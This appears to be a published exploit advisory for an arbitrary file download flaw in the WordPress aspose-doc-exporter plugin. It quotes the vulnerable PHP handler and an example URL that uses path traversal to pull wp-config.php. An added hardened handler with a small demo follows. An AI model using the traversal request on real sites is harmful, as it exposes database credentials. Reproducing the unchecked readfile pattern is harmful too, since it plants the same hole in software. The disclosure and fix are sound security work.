WordPress Aspose Doc Exporter plugin suffers from an arbitrary file download vulnerability.
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title: WordPress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
| [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
| [+] Tested on: Windows,Linux |
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php
| [+] Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
| [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
| [+]
| [+] Examples : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*
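
For comparison with the vulnerable code above, a hardened form of the same download handler. This is an added example, not code from the plugin or its vendor. The function names resolve_export_path and send_export, and the idea of one dedicated export directory passed in as $baseDir, are assumptions made for illustration.

```php
<?php
// Added example: hardened counterpart of the download handler quoted above.
// Assumptions (not from the plugin): exported files live in one dedicated
// directory, and the caller passes that directory in as $baseDir.

// Map a user-supplied name to a file inside $baseDir, or return null.
function resolve_export_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Keep only the final path component, treating "\" as a separator too.
    $name = basename(str_replace('\\', '/', $requested));
    // realpath() resolves symlinks and "..", and fails for missing files.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The resolved file must still sit inside the export directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function send_export(string $baseDir, string $requested): void
{
    $path = resolve_export_path($baseDir, $requested);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    // Strip characters that could break out of the quoted header value.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Constructed demo: one export file inside a temp directory.
$dir = sys_get_temp_dir() . '/exports_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . '/report.doc', 'demo');
var_dump(resolve_export_path($dir, 'report.doc') !== null);    // legitimate name
var_dump(resolve_export_path($dir, '../../../wp-config.php')); // traversal input
var_dump(resolve_export_path($dir, '/etc/passwd'));            // absolute path input
```

The example covers path confinement only; it assumes the caller has already decided that the requester is allowed to download exports.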